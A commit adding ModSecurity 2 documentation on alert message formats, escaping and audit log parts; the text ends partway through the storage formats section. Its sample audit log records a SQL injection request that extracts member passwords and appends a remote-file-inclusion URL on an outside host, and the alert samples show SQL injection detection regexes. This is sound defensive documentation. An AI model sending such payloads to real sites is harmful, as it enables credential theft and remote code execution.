Add the data formats documentation.

2026-01-16 08:27:10 +03:00 · 2008-12-01 10:39:46 +00:00
parent facacae238
commit fd5cf18ca4
1 changed files with 972 additions and 0 deletions
--- a/doc/modsecurity2-data-formats.xml
+++ b/doc/modsecurity2-data-formats.xml
@@ -0,0 +1,972 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.4//EN"
+                         "http://www.docbook.org/xml/4.4/docbookx.dtd">
+<article>
+    <title>ModSecurity 2 Data Formats</title>
+    <articleinfo>
+        <releaseinfo>Version 2.6.0-trunk (November 27, 2008)</releaseinfo>
+        <copyright>
+            <year>2004-2008</year>
+            <holder>Breach Security, Inc. (<ulink url="http://www.breach.com"
+                    >http://www.breach.com</ulink>)</holder>
+        </copyright>
+    </articleinfo>
+    <para>The purpose of this document is to describe the formats of the ModSecurity alert messages,
+        transaction logs and communication protocols, which would not only allow for a better
+        understanding what ModSecurity does but also for an easy integration with third-party tools
+        and products.</para>
+    <section>
+        <title>Alerts</title>
+        <para>As part of its operations ModSecurity will emit alerts, which are eather
+                <emphasis>warnings</emphasis> (non-fatal) or <emphasis>errors</emphasis> (fatal,
+            usually leading to the interception of the transaction in question). Below is an example
+            of a ModSecurity alert entry:</para>
+        <programlisting>Access denied with code 505 (phase 1). Match of "rx
+  ^HTTP/(0\\\\.9|1\\\\.[01])$" against "REQUEST_PROTOCOL" required.
+  [id "960034"] [msg "HTTP protocol version is not allowed by policy"]
+  [severity "CRITICAL"] [uri "/"] [unique_id "PQaTTVBEUOkAAFwKXrYAAAAM"]</programlisting>
+        <note>
+            <para>Alerts will only ever contain one line of text but we've broken the above example
+                into multiple lines to make it fit into the page.</para>
+        </note>
+        <para>Each alert entry begins with the engine message, which describes what ModSecurity did
+            and why. For
+            example:<programlisting>Access denied with code 505 (phase 1). Match of "rx
+  ^HTTP/(0\\\\.9|1\\\\.[01])$" against "REQUEST_PROTOCOL" required.</programlisting></para>
+        <section>
+            <title>Alert Action Description</title>
+            <para>The first part of the engine message tells you whether ModSecurity acted to
+                interrupt transaction or rule processing:</para>
+            <orderedlist>
+                <listitem>
+                    <para>If the alert is only a warning, the first sentence will simply say
+                            <emphasis>Warning</emphasis>.</para>
+                </listitem>
+                <listitem>
+                    <para>If the transaction was intercepted, the first sentence will begin with
+                            <emphasis>Access denied</emphasis>. What follows is the list of possible
+                        messages related to transaction interception:</para>
+                    <itemizedlist>
+                        <listitem>
+                            <para><emphasis>Access denied with code %0</emphasis> - a response with
+                                status code <literal>%0</literal> was sent.</para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Access denied with connection close</emphasis> -
+                                connection was abruptly closed.</para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Access denied with redirection to %0 using status
+                                    %1</emphasis> - a redirection to URI <literal>%0</literal> was
+                                issued using status <literal>%1</literal>.</para>
+                        </listitem>
+                    </itemizedlist>
+                </listitem>
+                <listitem>
+                    <para>There is also a special message that ModSecurity emits where an <literal
+                            >allow</literal> action is executed. There are three variations of this
+                        type of message:</para>
+                    <itemizedlist>
+                        <listitem>
+                            <para><emphasis>Access allowed</emphasis> - rule engine stopped
+                                processing rules (transaction was unaffected).</para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Access to phase allowed</emphasis> - rule engine stopped
+                                processing rules in the current phase only. Subsequent phases will
+                                be processed normally. Transaction was not affected by this rule but
+                                it may be affected by any of the rules in the subsequent
+                                phase.</para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Access to request allowed</emphasis> - rule engine
+                                stopped processing rules in the current phase. Phases prior to
+                                request execution in the backend (currently phases 1 and 2) will not
+                                be processed. The response phases (currently phases 3 and 4) and
+                                others (currently phase 5) will be processed as normal. Transaction
+                                was not affected by this rule but it may be affected by any of the
+                                rules in the subsequent phase.</para>
+                        </listitem>
+                    </itemizedlist>
+                </listitem>
+            </orderedlist>
+        </section>
+        <section>
+            <title>Alert Justification Description</title>
+            <para>The second part of the engine message explains <emphasis>why</emphasis> the alert
+                was generated. Since it is automatically generated from the rules it will be very
+                technical in nature, talking about operators and their parameters and give you
+                insight into what the rule looked like. But this message cannot give you insight
+                into the reasoning behind the rule. A well-written rule will always specify a
+                human-readable message (using the <literal>msg</literal> action) to provide further
+                information.</para>
+            <para>The format of the second part of the engine message depends on whether it was
+                generated by the operator (which happens on a match) or by the rule processor (which
+                happens where there is not a match, but the negation was used):</para>
+            <itemizedlist>
+                <listitem>
+                    <para><literal>@beginsWith</literal> - <emphasis>String match %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@contains</literal> - <emphasis>String match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@containsWord</literal> - <emphasis>String match %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@endsWith</literal> - <emphasis>String match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@eq</literal> - <emphasis>Operator EQ matched %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@ge</literal> - <emphasis>Operator GE matched %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@geoLookup</literal> - <emphasis>Geo lookup for %0 succeeded at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@inspectFile</literal> - <emphasis>File %0 rejected by the
+                            approver script %1: %2</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@le</literal> - <emphasis>Operator LE matched %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@lt</literal> - <emphasis>Operator LT matched %0 at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@rbl</literal> - <emphasis>RBL lookup of %0 succeeded at
+                            %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@rx</literal> - <emphasis>Pattern match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@streq</literal> - <emphasis>String match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateByteRange</literal> - <emphasis>Found %0 byte(s) in %1
+                            outside range: %2.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateDTD</literal> - <emphasis>XML: DTD validation
+                            failed.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateSchema</literal> - <emphasis>XML: Schema validation
+                            failed.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateUrlEncoding</literal></para>
+                    <itemizedlist>
+                        <listitem>
+                            <para><emphasis>Invalid URL Encoding: Non-hexadecimal digits used at
+                                    %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid URL Encoding: Not enough characters at the end
+                                    of input at %0.</emphasis></para>
+                        </listitem>
+                    </itemizedlist>
+                </listitem>
+                <listitem>
+                    <para><literal>@validateUtf8Encoding</literal></para>
+                    <itemizedlist>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: not enough bytes in character at
+                                    %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: invalid byte value in character
+                                    at %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: overlong character detected at
+                                    %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: use of restricted character at
+                                    %0.</emphasis></para>
+                        </listitem>
+                        <listitem>
+                            <para><emphasis>Invalid UTF-8 encoding: decoding error at
+                                %0.</emphasis></para>
+                        </listitem>
+                    </itemizedlist>
+                </listitem>
+                <listitem>
+                    <para><literal>@verifyCC</literal> - <emphasis>CC# match %0 at
+                        %1.</emphasis></para>
+                </listitem>
+            </itemizedlist>
+            <para>Messages not related to operators:</para>
+            <itemizedlist>
+                <listitem>
+                    <para>When <literal>SecAction</literal> directive is processed -
+                            <emphasis>Unconditional match in SecAction.</emphasis></para>
+                </listitem>
+                <listitem>
+                    <para>When <literal>SecRule</literal> does not match but negation is used -
+                            <emphasis>Match of %0 against %1 required.</emphasis></para>
+                </listitem>
+            </itemizedlist>
+            <note>
+                <para>The parameters to the operators <literal>@rx</literal> and <literal
+                        >@pm</literal> (regular expression and text pattern, respectively) will be
+                    truncated to 252 bytes if they are longer than this limit. In this case the
+                    parameter in the alert message will be terminated with three dots.</para>
+            </note>
+        </section>
+        <section>
+            <title>Meta-data</title>
+            <para>The metadata fields are always placed at the end of the alert entry. Each metadata
+                field is a text fragment that consists of an open bracket followed by the metadata
+                field name, followed by the value and the closing bracket. What follows is the text
+                fragment that makes up the <literal>id</literal> metadata field.</para>
+            <programlisting>[id "960034"]</programlisting>
+            <para>The following metadata fields are currently used:</para>
+            <orderedlist>
+                <listitem>
+                    <para><literal>offset</literal> - The byte offset where a match occured within
+                        the target data. This is not always available.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>id</literal> - Unique rule ID, as specified by the <literal
+                            >id</literal> action.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>rev</literal> - Rule revision, as specified by the <literal
+                            >rev</literal> action.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>msg</literal> - Human-readable message, as specified by the
+                            <literal>msg</literal> action.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>severity</literal> - Event severity as text, as specified by the
+                            <literal>severity</literal> action. The possible values (with their
+                        corresponding numberical values in brackets) are <literal
+                            >EMERGENCY</literal> (0), <literal>ALERT</literal> (1), <literal
+                            >CRITICAL</literal> (2), <literal>ERROR</literal> (3), <literal
+                            >WARNING</literal> (4), <literal>NOTICE</literal> (5), <literal
+                            >INFO</literal> (6) and <literal>DEBUG</literal> (7).</para>
+                </listitem>
+                <listitem>
+                    <para><literal>unique_id</literal> - Unique event ID, generated
+                        automatically.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>uri</literal> - Request URI.</para>
+                </listitem>
+                <listitem>
+                    <para><literal>logdata</literal> - contains transaction data fragment, as
+                        specified by the <literal>logdata</literal> action.</para>
+                </listitem>
+            </orderedlist>
+        </section>
+        <section>
+            <title>Escaping</title>
+            <para>ModSecurity alerts will always contain text fragments that were taken from
+                configuration or the transaction. Such text fragments escaped before they are user
+                in messages, in order to sanitise the potentially dangerous characters. They are
+                also sometimes surrounded using double quotes. The escaping algorithm is as
+                    follows:<orderedlist>
+                    <listitem>
+                        <para>Characters <literal>0x08</literal> (<literal>BACKSPACE</literal>),
+                                <literal>0x0a</literal> (<literal>NEWLINE</literal>), <literal
+                                >0x10</literal> (<literal>CARRIAGE RETURN</literal>), <literal
+                                >0x09</literal> (<literal>HORIZONTAL TAB</literal>) and <literal
+                                >0x0b</literal> (<literal>VERTICAL TAB</literal>) will be
+                            represented as <literal>\b</literal>, <literal>\n</literal>, <literal
+                                >\r</literal>, <literal>\t</literal> and <literal>\v</literal>,
+                            respectively.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Bytes from the ranges <literal>0-0x1f</literal> and <literal
+                                >0x7f-0xff</literal> (inclusive) will be represented as <literal
+                                >\xHH</literal>, where <literal>HH</literal> is the hexadecimal
+                            value of the byte.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Backslash characters (<literal>\</literal>) will be represented as
+                                <literal>\\</literal>.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Each double quote character will be represented as <literal
+                                >\"</literal>, but only if the entire fragment is surrounded with
+                            double quotes.</para>
+                    </listitem>
+                </orderedlist></para>
+        </section>
+        <section>
+            <title>Alerts in the Apache Error Log</title>
+            <para>Every ModSecurity alert conforms to the following format when it appears in the
+                Apache error log:</para>
+            <programlisting>[Sun Jun 24 10:19:58 2007] [error] [client 192.168.0.1]
+            ModSecurity: ALERT_MESSAGE</programlisting>
+            <para>The above is a standard Apache error log format. The <literal>ModSecurity:
+                </literal> prefix is specific to ModSecurity. It is used to allow quick
+                identification of ModSecurity alert messages when they appear in the same file next
+                to other Apache messages.</para>
+            <para>The actual message (<literal>ALERT_MESSAGE</literal> in the example above) is in
+                the same format as described in the <emphasis>Alerts</emphasis> section.</para>
+            <note>
+                <para>Apache further escapes ModSecurity alert messages before writing them to the
+                    error log. This means that all backslash characters will be doubled in the error
+                    log. In practice, since ModSecurity will already represent a single backslash
+                    within an untrusted text fragment as two backslashes, the end result in the
+                    Apache error log will be <emphasis>four</emphasis> backslashes. Thus, if you
+                    need to interpret a ModSecurity message from the error log, you should decode
+                    the message part after the <literal>ModSecurity:</literal> prefix first. This
+                    step will peel the first encoding layer.</para>
+            </note>
+        </section>
+        <section>
+            <title>Alerts in Audit Logs</title>
+            <para>Alerts are transported in the <literal>H</literal> section of the ModSecurity
+                Audit Log. Alerts will appear each on a separate line and in the order they were
+                generated by ModSecurity. Each line will be in the following format:</para>
+            <programlisting>Message: ALERT_MESSAGE</programlisting>
+            <para>Below is an example of an <literal>H</literal> section that contains two alert
+                messages:</para>
+            <programlisting>--c7036611-H--
+Message: Warning. Match of "rx ^apache.*perl" against
+  "REQUEST_HEADERS:User-Agent" required. [id "990011"] [msg "Request
+  Indicates an automated program explored the site"] [severity "NOTICE"]
+Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b
+  (?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)
+  |.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_
+  (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|
+  makewebt ..." at ARGS:c. [id "950001"] [msg "SQL Injection Attack.
+  Matched signature: union select"] [severity "CRITICAL"]
+Stopwatch: 1199881676978327 2514 (396 2224 -)
+Producer: ModSecurity v2.x.x (Apache 2.x)
+Server: Apache/2.x.x
+
+--c7036611-Z--</programlisting>
+        </section>
+    </section>
+    <section>
+        <title>Audit Log</title>
+        <para>ModSecurity records one transaction in a single audit log file. Below is an
+            example:</para>
+        <programlisting>--c7036611-A--
+[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 209.90.77.54 64995
+  80.68.80.233 80
+--c7036611-B--
+GET //EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,
+  char(77),password,char(77),email_address,char(77),info,char(77),user_level,
+  char(77))/**/from/**/eb_members/**/where/**/userid=1/*http://kamloopstutor.
+  com/images/banners/on.txt? HTTP/1.1
+TE: deflate,gzip;q=0.3
+Connection: TE, cslose
+Host: www.example.com
+User-Agent: libwww-perl/5.808
+
+--c7036611-F--
+HTTP/1.1 404 Not Found
+Content-Length: 223
+Connection: close
+Content-Type: text/html; charset=iso-8859-1
+
+--c7036611-H--
+Message: Warning. Match of "rx ^apache.*perl" against
+  "REQUEST_HEADERS:User-Agent" required. [id "990011"] [msg "Request
+  Indicates an automated program explored the site"] [severity "NOTICE"]
+Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b
+  (?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)
+  |.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_
+  (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|
+  makewebt ..." at ARGS:c. [id "950001"] [msg "SQL Injection Attack.
+  Matched signature: union select"] [severity "CRITICAL"]
+Stopwatch: 1199881676978327 2514 (396 2224 -)
+Producer: ModSecurity v2.x.x (Apache 2.x)
+Server: Apache/2.x.x
+
+--c7036611-Z--
+</programlisting>
+        <para>The file consist of multiple sections, each in different format. Separators are used
+            to define sections:</para>
+        <programlisting>--c7036611-A--</programlisting>
+        <para>A separator always begins on a new line and conforms to the following format:</para>
+        <orderedlist>
+            <listitem>
+                <para>Two dashes</para>
+            </listitem>
+            <listitem>
+                <para>Unique boundary, which consists from several hexadecimal characters.</para>
+            </listitem>
+            <listitem>
+                <para>One dash character.</para>
+            </listitem>
+            <listitem>
+                <para>Section identifier, currently a single uppercase letter.</para>
+            </listitem>
+            <listitem>
+                <para>Two trailing dashes.</para>
+            </listitem>
+        </orderedlist>
+        <para>Refer to the documentation for <literal>SecAuditLogParts</literal> for the explanation
+            of each part.</para>
+        <section>
+            <title>Parts</title>
+            <para>This section documents the audit log parts available in ModSecurity 2.x. They are: <itemizedlist>
+                    <listitem>
+                        <para><literal moreinfo="none">A</literal> - audit log header</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">B</literal> - request headers</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">C</literal> - request body</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">D</literal> - intended response headers (NOT
+                            IMPLEMENTED)</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">E</literal> - intended response body</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">F</literal> - response headers</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">G</literal> - response body (NOT
+                            IMPLEMENTED)</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">H</literal> - audit log trailer</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">I</literal> - reduced multipart request
+                            body</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">J</literal> - multipart files information
+                            (NOT IMPLEMENTED)</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">K</literal> - matched rules
+                            information</para>
+                    </listitem>
+                    <listitem>
+                        <para><literal moreinfo="none">Z</literal> - audit log footer</para>
+                    </listitem>
+                </itemizedlist></para>
+            <section>
+                <title>Audit Log Header (<literal>A</literal>)</title>
+                <para>ModSecurity 2.x audit log entries always begin with the header part. For
+                    example:</para>
+                <programlisting>--c7036611-A--
+[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 209.90.77.54 64995
+  80.68.80.233 80</programlisting>
+                <para>The header contains only one line, with the following information on
+                    it:</para>
+                <orderedlist>
+                    <listitem>
+                        <para>Timestamp</para>
+                    </listitem>
+                    <listitem>
+                        <para>Unique transaction ID</para>
+                    </listitem>
+                    <listitem>
+                        <para>Source IP address (IPv4)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Source port</para>
+                    </listitem>
+                    <listitem>
+                        <para>Destination IP address (IPv4)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Destination port</para>
+                    </listitem>
+                </orderedlist>
+            </section>
+            <section>
+                <title>Request Headers (<literal>B</literal>)</title>
+                <para>The request headers part contains the request line and the request headers.
+                    The information present in this part will not be identical to that sent by the
+                    client responsible for the transaction. ModSecurity 2.x for Apache does not have
+                    access to the raw data; it sees what Apache itself sees. While the end result
+                    may be identical to the raw request, differences are possible in some
+                    areas:</para>
+                <orderedlist>
+                    <listitem>
+                        <para>If any of the fields are <literal>NUL</literal>-terminated, Apache
+                            will only see the content prior to the NUL.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Headers that span multiple lines (feature known as header folding)
+                            will be collapsed into a single line.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Multiple headers with the same name will be combined into a single
+                            header (as allowed by the HTTP RFC).</para>
+                    </listitem>
+                </orderedlist>
+            </section>
+            <section>
+                <title>Request Body (<literal>C</literal>)</title>
+                <para>This part contains the request body of the transaction, after dechunking and
+                    decompression (if applicable).</para>
+            </section>
+            <section>
+                <title>Intended Response Headers (<literal>D</literal>)</title>
+                <para>This part contains the status line and the request headers that would have
+                    been delivered to the client had ModSecurity not intervened. Thus this part
+                    makes sense only for transactions where ModSecurity altered the data flow. By
+                    differentiating before the intended and the final response headers, we are able
+                    to record what was internally ready for sending, but also what was actually
+                    sent.</para>
+                <note>
+                    <para>This part is reserved for future use. It is not implemented in ModSecurity
+                        2.x.</para>
+                </note>
+            </section>
+            <section>
+                <title>Intended Response Body (<literal>E</literal>)</title>
+                <para>This part contains the transaction response body (before compression and
+                    chunking, where used) that was either sent or would have been sent had
+                    ModSecurity not intervened. You can find whether interception took place by
+                    looking at the <literal>Action</literal> header of the part <literal
+                    >H</literal>. If that header is present, and the interception took place in
+                    phase 3 or 4 then the <literal>E</literal> part contains the intended response
+                    body. Otherwise, it contains the actual response body.</para>
+                <note>
+                    <para>Once the <literal>G</literal> (actual response body) part is implemented,
+                        part <literal>E</literal> will be present only in audit logs that contain a
+                        transaction that was intercepted, and there will be no need for further
+                        analsys.</para>
+                </note>
+            </section>
+            <section>
+                <title>Response Headers (<literal>F</literal>)</title>
+                <para>This part contains the actual response headers sent to the client. Since
+                    ModSecurity 2.x for Apache does not access the raw connection data, it
+                    constructs part F out of the internal Apache data structures that hold the
+                    response headers. Some headers are generated just before they are sent and
+                    ModSecurity is not able to record those. They are the <literal>Date</literal>
+                    and <literal>Server</literal> response headers.</para>
+            </section>
+            <section>
+                <title>Response Body (G)</title>
+                <para>When implemented, this part will contain the actual response body before
+                    compression and chunking.</para>
+                <note>
+                    <para>This part is reserved for future use. It is not implemented in ModSecurity
+                        2.x.</para>
+                </note>
+            </section>
+            <section>
+                <title>Audit Log Trailer (H)</title>
+                <para>Part <literal>H</literal> contains additional transaction meta-data that was
+                    obtained from the web server or from ModSecurity itself. The part contains a
+                    number of trailer headers, which are similar to HTTP headers (without support
+                    for header folding):<orderedlist>
+                        <listitem>
+                            <para>Action</para>
+                        </listitem>
+                        <listitem>
+                            <para>Apache-Error</para>
+                        </listitem>
+                        <listitem>
+                            <para>Message</para>
+                        </listitem>
+                        <listitem>
+                            <para>Producer</para>
+                        </listitem>
+                        <listitem>
+                            <para>Response-Body-Transformed</para>
+                        </listitem>
+                        <listitem>
+                            <para>Sanitised-Args</para>
+                        </listitem>
+                        <listitem>
+                            <para>Sanitised-Request-Headers</para>
+                        </listitem>
+                        <listitem>
+                            <para>Sanitised-Response-Headers</para>
+                        </listitem>
+                        <listitem>
+                            <para>Server</para>
+                        </listitem>
+                        <listitem>
+                            <para>Stopwatch</para>
+                        </listitem>
+                        <listitem>
+                            <para>WebApp-Info</para>
+                        </listitem>
+                    </orderedlist></para>
+                <section>
+                    <title>Action</title>
+                    <para>The <literal>Action</literal> header is present only for the transactions
+                        that were intercepted:</para>
+                    <programlisting>Action: Intercepted (phase 2)</programlisting>
+                    <para>The phase information documents the phase in which the decision to
+                        intercept took place.</para>
+                </section>
+                <section>
+                    <title>Apache-Error</title>
+                    <para>The Apache-Error header contains Apache error log messages observed by
+                        ModSecurity, excluding those sent by ModSecurity itself. For example:</para>
+                    <programlisting>Apache-Error: [file "/tmp/buildd/apache2-2.0.54/build-tree/apache2/server/
+  core.c"] [line 3505] [level 3] File does not exist: /var/www/www.
+  modsecurity.org/fst/documentation/modsecurity-apache/2.5.0-dev2</programlisting>
+                </section>
+                <section>
+                    <title>Message</title>
+                    <para>Zero or more <literal>Message</literal> headers can be present in any
+                        trailer, and each such header will represent a single ModSecurity warning or
+                        error, displayed in the order they were raised.</para>
+                    <para>The example below was broken into multiple lines to make it fit this
+                        page:</para>
+                    <programlisting>Message: Access denied with code 400 (phase 2). Pattern match "^\w+:/" at
+  REQUEST_URI_RAW. [file "/etc/apache2/rules-1.6.1/modsecurity_crs_20_
+  protocol_violations.conf"] [line "74"] [id "960014"] [msg "Proxy access
+  attempt"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/PROXY_ACCESS"]</programlisting>
+                </section>
+                <section>
+                    <title>Producer</title>
+                    <para>The <literal>Producer</literal> header identifies the product that
+                        generated the audit log. For example:</para>
+                    <programlisting>Producer: ModSecurity for Apache/2.5.5 (http://www.modsecurity.org/).</programlisting>
+                    <para>ModSecurity allows rule sets to add their own signatures to the <literal
+                            >Producer</literal> information (this is done using the <literal
+                            >SecComponentSignature</literal> directive). Below is an example of the
+                            <literal>Producer</literal> header with the signature of one component
+                        (all one line):</para>
+                    <programlisting>Producer: ModSecurity for Apache/2.5.5 (http://www.modsecurity.org/);
+    MyComponent/1.0.0 (Beta).</programlisting>
+                </section>
+                <section>
+                    <title>Response-Body-Transformed</title>
+                    <para>This header will appear in every audit log that contains a response
+                        body:</para>
+                    <programlisting>Response-Body-Transformed: Dechunked</programlisting>
+                    <para>The contents of the header is constant at present, so the header is only
+                        useful as a reminder that the recorded response body is not identical to the
+                        one sent to the client. The actual content is the same, except that Apache
+                        may further compress the body and deliver it in chunks.</para>
+                </section>
+                <section>
+                    <title>Sanitised-Args</title>
+                    <para>The <literal>Sanitised-Args</literal> header contains a list of arguments
+                        that were sanitised (each byte of their content replaced with an asterisk)
+                        before logging. For example:</para>
+                    <programlisting>Sanitised-Args: "old_password", "new_password", "new_password_repeat".</programlisting>
+                </section>
+                <section>
+                    <title>Sanitised-Request-Headers</title>
+                    <para>The <literal>Sanitised-Request-Headers</literal> header contains a list of
+                        request headers that were sanitised before logging. For example:</para>
+                    <programlisting>Sanitised-Request-Headers: "Authentication".</programlisting>
+                </section>
+                <section>
+                    <title>Sanitised-Response-Headers</title>
+                    <para>The <literal>Sanitised-Response-Headers</literal> header contains a list
+                        of response headers that were sanitised before logging. For example:</para>
+                    <programlisting>Sanitised-Response-Headers: "My-Custom-Header".</programlisting>
+                </section>
+                <section>
+                    <title>Server</title>
+                    <para>The <literal>Server</literal> header identifies the web server. For
+                        example:</para>
+                    <programlisting>Server: Apache/2.0.54 (Debian GNU/Linux) mod_ssl/2.0.54 OpenSSL/0.9.7e</programlisting>
+                    <para>This information may sometimes be present in any of the parts that contain
+                        response headers, but there are a few cases when it isn't:<orderedlist>
+                            <listitem>
+                                <para>None of the response headers were recoreded.</para>
+                            </listitem>
+                            <listitem>
+                                <para>The information in the response headers is not accurate
+                                    because server signature masking was used.</para>
+                            </listitem>
+                        </orderedlist></para>
+                </section>
+                <section>
+                    <title>Stopwatch</title>
+                    <para>The <literal>Stopwatch</literal> header provides certain diagnostic
+                        information that allows you to determine the performance of the web server
+                        and of ModSecurity itself. It will typically look like this:</para>
+                    <programlisting>Stopwatch: 1222945098201902 2118976 (770* 4400 -)</programlisting>
+                    <para>Each line can contain up to 5 different values. Some values can be absent;
+                        each absent value will be replaced with a dash.</para>
+                    <para>The meanings of the values are as follows (all values are in
+                            microseconds):<orderedlist>
+                            <listitem>
+                                <para>Transaction timestamp in microseconds since January 1st,
+                                    1970.</para>
+                            </listitem>
+                            <listitem>
+                                <para>Transaction duration.</para>
+                            </listitem>
+                            <listitem>
+                                <para>The time between the moment Apache started processing the
+                                    request and until phase 2 of ModSecurity began. If an asterisk
+                                    is present that means the time includes the time it took
+                                    ModSecurity to read the request body from the client (typically
+                                    slow). This value can be used to provide a rough estimate of the
+                                    client speed, but only with larger request bodies (the smaller
+                                    request bodies may arrive in a single TCP/IP packet).</para>
+                            </listitem>
+                            <listitem>
+                                <para>The time between the start of processing and until phase 2 was
+                                    completed. If you substract the previous value from this value
+                                    you will get the exact duration of phase 2 (which is the main
+                                    rule processing phase).</para>
+                            </listitem>
+                            <listitem>
+                                <para>The time between the start of request processing and util we
+                                    began sending a fully-buffered response body to the client. If
+                                    you substract this value from the total transaction duration and
+                                    divide with the response body size you may get a rough estimate
+                                    of the client speed, but only for larger response bodies.</para>
+                            </listitem>
+                        </orderedlist></para>
+                </section>
+                <section>
+                    <title>WebApp-Info</title>
+                    <para>The <literal>WebApp-Info</literal> header contains information on the
+                        application to which the recorded transaction belongs. This information will
+                        appear only if it is known, which will happen if <literal
+                            >SecWebAppId</literal> was set, or <literal>setsid</literal> or <literal
+                            >setuid</literal> executed in the transaction.</para>
+                    <para>The header uses the following format:</para>
+                    <programlisting>WebApp-Info: "WEBAPPID" "SESSIONID" "USERID"</programlisting>
+                    <para>Each unknown value is replaced with a dash.</para>
+                </section>
+            </section>
+            <section>
+                <title>Reduced Multipart Request Body (<literal>I</literal>)</title>
+                <para>Transactions that deal with file uploads tend to be large, yet the file
+                    contents is not always relevant from the security point of view. The <literal
+                        >I</literal> part was designed to avoid recording raw <literal
+                        >multipart/form-data</literal> request bodies, replacing them with a
+                    simulated <literal>application/x-www-form-urlencoded</literal> body that
+                    contains the same key-value parameters.</para>
+                <para>The reduced multipart request body will not contain any file information. The
+                        <literal>J</literal> part (currently not implemented) is intended to carry
+                    the file metadata.</para>
+            </section>
+            <section>
+                <title>Multipart Files Information (<literal>J</literal>)</title>
+                <para>The purpose of part <literal>J</literal> is to record the information on the
+                    files contained in a <literal>multipart/form-data</literal> request body. This
+                    is handy in the cases when the original request body was not recorded, or when
+                    only a reduced version was recorded (e.g. when part <literal>I</literal> was
+                    used instead of part <literal>C</literal>).</para>
+                <note>
+                    <para>This part is reserved for future use. It is not implemented in ModSecurity
+                        2.x.</para>
+                </note>
+            </section>
+            <section>
+                <title>Matched Rules (<literal>K</literal>)</title>
+                <para>The matched rules part contains a record of all ModSecurity rules that matched
+                    during transaction processing.</para>
+                <para>This part is available starting with ModSecurity 2.5.x.</para>
+            </section>
+            <section>
+                <title>Audit Log Footer (<literal>Z</literal>)</title>
+                <para>Part <literal>Z</literal> is a special part that only has a boundary but no
+                    content. Its only purpose is to signal the end of an audit log.</para>
+            </section>
+        </section>
+        <section>
+            <title>Storage Formats</title>
+            <para>ModSecurity supports two audit log storage formats:<orderedlist>
+                    <listitem>
+                        <para><emphasis>Serial</emphasis> audit log format - multiple audit log
+                            files stored in the same file.</para>
+                    </listitem>
+                    <listitem>
+                        <para><emphasis>Concurrent</emphasis> audit log format - one file is used
+                            for every audit log.</para>
+                    </listitem>
